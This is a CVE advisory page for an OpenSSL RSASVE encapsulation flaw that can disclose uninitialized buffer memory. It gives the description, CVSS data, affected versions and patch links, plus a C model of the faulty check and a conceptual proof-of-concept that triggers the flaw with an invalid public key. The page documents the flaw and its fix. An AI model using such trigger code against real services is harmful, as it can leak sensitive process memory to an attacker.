Security Vulnerability Report
CVE-2026-31790 CVSS 7.5 HIGH

CVE-2026-31790

Published: 2026-04-07 22:16:22
Last Modified: 2026-05-12 13:17:35

Description

Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send the contents of an uninitialized memory buffer to a malicious peer.

Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process, which leads to sensitive data leakage to an attacker.

RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced.

If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext.

As a workaround, calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue.

The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.
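The defective return-value check described above, modelled in stand-alone C as an added illustration (this is not OpenSSL's code; the page only summarises it). `model_rsa_public_encrypt` stands in for RSA_public_encrypt() with a `key_valid` flag for whatever makes the real call fail, `NLEN` is a constructed tiny modulus size, and the output buffer is pre-filled to stand for stale contents.

```c
#include <string.h>
#define NLEN 8  /* modulus size in bytes for this model (constructed) */

/* Model of RSA_public_encrypt(): bytes written on success, -1 on error.
 * key_valid stands in for whatever makes the real call fail. */
static int model_rsa_public_encrypt(int key_valid, const unsigned char *in,
                                    unsigned char *out)
{
    if (!key_valid)
        return -1;
    memcpy(out, in, NLEN);  /* stands in for RSAEP, no real arithmetic */
    return NLEN;
}

/* Affected check: "non-zero" treats -1 as success, so outlen is set and
 * the caller's ciphertext buffer is handed back with stale contents. */
static int rsasve_generate_affected(int key_valid, const unsigned char *z,
                                    unsigned char *out, size_t *outlen)
{
    int ret = model_rsa_public_encrypt(key_valid, z, out);
    if (ret) {
        ret = 1;
        *outlen = NLEN;
    }
    return ret;
}

/* Corrected check: only a positive return counts as success. */
static int rsasve_generate_fixed(int key_valid, const unsigned char *z,
                                 unsigned char *out, size_t *outlen)
{
    int ret = model_rsa_public_encrypt(key_valid, z, out);
    if (ret <= 0)
        return 0;
    *outlen = NLEN;
    return 1;
}

/* 1 if the affected path reports success for an invalid key while leaving
 * the pre-filled (stale) buffer untouched: that is the disclosed data. */
static int stale_buffer_reported_as_ciphertext(void)
{
    unsigned char z[NLEN], out[NLEN];
    size_t outlen = 0;
    memset(z, 0x11, NLEN);    /* constructed random value z */
    memset(out, 0xAA, NLEN);  /* constructed stale buffer contents */
    if (rsasve_generate_affected(0, z, out, &outlen) != 1 || outlen != NLEN)
        return 0;
    return out[0] == 0xAA && out[NLEN - 1] == 0xAA;
}
```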

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-754 (Improper Check for Unusual or Exceptional Conditions)

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (versions from 3.0.0 up to, but excluding, 3.0.20) - VULNERABLE
cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (versions from 3.3.0 up to, but excluding, 3.3.7) - VULNERABLE
cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (versions from 3.4.0 up to, but excluding, 3.4.5) - VULNERABLE
cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (versions from 3.5.0 up to, but excluding, 3.5.6) - VULNERABLE
cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* (versions from 3.6.0 up to, but excluding, 3.6.2) - VULNERABLE
OpenSSL FIPS Module 3.0
OpenSSL FIPS Module 3.1
OpenSSL FIPS Module 3.3
OpenSSL FIPS Module 3.4
OpenSSL FIPS Module 3.5
OpenSSL FIPS Module 3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
#include <openssl/evp.h>
#include <openssl/pem.h>
#include <openssl/err.h>
#include <stdio.h>
#include <stdlib.h>

/* Conceptual PoC for CVE-2026-31790.
 * Demonstrates the uninitialized-memory disclosure risk when
 * EVP_PKEY_encapsulate() is used with an invalid RSA public key. */
int main(void)
{
    EVP_PKEY_CTX *ctx = NULL;
    EVP_PKEY *pkey = NULL;
    unsigned char *out = NULL;     /* ciphertext buffer (left uninitialized on purpose) */
    unsigned char *secret = NULL;  /* shared secret buffer */
    size_t outlen = 0, secretlen = 0;
    int rc = 1;

    /* 1. Load an attacker-controlled (invalid) RSA public key */
    FILE *fp = fopen("invalid_rsa_pub.pem", "r");
    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    pkey = PEM_read_PUBKEY(fp, NULL, NULL, NULL);
    fclose(fp);
    if (pkey == NULL) {
        fprintf(stderr, "PEM_read_PUBKEY failed\n");
        ERR_print_errors_fp(stderr);
        return 1;
    }

    /* 2. Create the encapsulation context and select the RSASVE KEM */
    ctx = EVP_PKEY_CTX_new(pkey, NULL);
    if (ctx == NULL
        || EVP_PKEY_encapsulate_init(ctx, NULL) <= 0
        || EVP_PKEY_CTX_set_kem_op(ctx, "RSASVE") <= 0) {
        fprintf(stderr, "Encapsulation init failed.\n");
        ERR_print_errors_fp(stderr);
        goto end;
    }

    /* 3. Vulnerable code path:
     *    If EVP_PKEY_public_check() is NOT called here, and the key makes the
     *    internal RSA encryption fail, the 'out' buffer may still be reported
     *    as a valid ciphertext while holding uninitialized data.
     * Workaround (uncomment to fix):
     *   if (EVP_PKEY_public_check(ctx) <= 0) goto end;
     */

    /* 4. Query the required sizes, allocate (uninitialized), then encapsulate */
    if (EVP_PKEY_encapsulate(ctx, NULL, &outlen, NULL, &secretlen) <= 0)
        goto end;
    out = malloc(outlen);
    secret = malloc(secretlen);
    if (out == NULL || secret == NULL)
        goto end;
    if (EVP_PKEY_encapsulate(ctx, out, &outlen, secret, &secretlen) <= 0) {
        printf("Encapsulation failed.\n");
    } else {
        printf("Encapsulation succeeded. Output buffer contents:\n");
        for (size_t i = 0; i < outlen; i++)
            printf("%02x", out[i]);
        printf("\n");
    }
    rc = 0;

end:
    free(out);
    free(secret);
    EVP_PKEY_CTX_free(ctx);
    EVP_PKEY_free(pkey);
    return rc;
}
```

References

https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac (Patch)
https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482 (Patch)
https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406 (Patch)
https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790 (Patch)
https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e (Patch)
https://openssl-library.org/news/secadv/20260407.txt (Vendor Advisory)
https://cert-portal.siemens.com/productcert/html/ssa-032379.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31790", "sourceIdentifier": "[email protected]", "published": "2026-04-07T22:16:21.770", "lastModified": "2026-05-12T13:17:34.750", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: Applications using RSASVE key encapsulation to establish\na secret encryption key can send contents of an uninitialized memory buffer to\na malicious peer.\n\nImpact summary: The uninitialized buffer might contain sensitive data from the\nprevious execution of the application process which leads to sensitive data\nleakage to an attacker.\n\nRSA_public_encrypt() returns the number of bytes written on success and -1\non error. The affected code tests only whether the return value is non-zero.\nAs a result, if RSA encryption fails, encapsulation can still return success to\nthe caller, set the output lengths, and leave the caller to use the contents of\nthe ciphertext buffer as if a valid KEM ciphertext had been produced.\n\nIf applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an\nattacker-supplied invalid RSA public key without first validating that key,\nthen this may cause stale or uninitialized contents of the caller-provided\nciphertext buffer to be disclosed to the attacker in place of the KEM\nciphertext.\n\nAs a workaround calling EVP_PKEY_public_check() or\nEVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate\nthe issue.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, 
"exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.20", "matchCriteriaId": "B28A8143-89A4-4332-A1F8-A65FB5AA829F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.7", "matchCriteriaId": "CF303B21-D9BF-461D-B7B0-A3FE1D557A9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.5", "matchCriteriaId": "DCCE43D0-8F17-475D-9EE6-842F758A9905"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.6", "matchCriteriaId": "F6BC0271-444D-4597-BF05-DC60034EAA49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.2", "matchCriteriaId": "4A9E621D-29D8-418A-BF37-BED333C14507"}]}]}], "references": [{"url": "https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e", "source": "[email protected]", 
"tags": ["Patch"]}, {"url": "https://openssl-library.org/news/secadv/20260407.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}